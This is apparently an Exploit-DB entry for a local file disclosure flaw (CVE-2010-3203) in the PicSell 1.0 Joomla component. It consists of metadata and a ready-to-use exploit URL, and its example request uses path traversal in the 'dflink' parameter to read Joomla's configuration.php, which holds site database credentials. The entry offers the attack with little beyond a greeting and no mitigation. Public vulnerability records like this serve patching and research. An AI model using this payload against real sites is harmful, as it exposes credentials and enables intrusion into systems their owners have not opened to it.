Joomla! Component PicSell 1.0 - Local File Disclosure

Author: Craw
type: webapps
platform: php
port: 
date_added: 2010-08-30 
date_updated: 2016-12-20 
verified: 1 
codes: CVE-2010-3203;OSVDB-67740 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Author: Craw
# Email: craw@element7.eu
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications

=======================================================

[+] ExploiT :

 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]


[+] Example :

 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php


=======================================================
Greetz @ LUXEMBOURG
=======================================================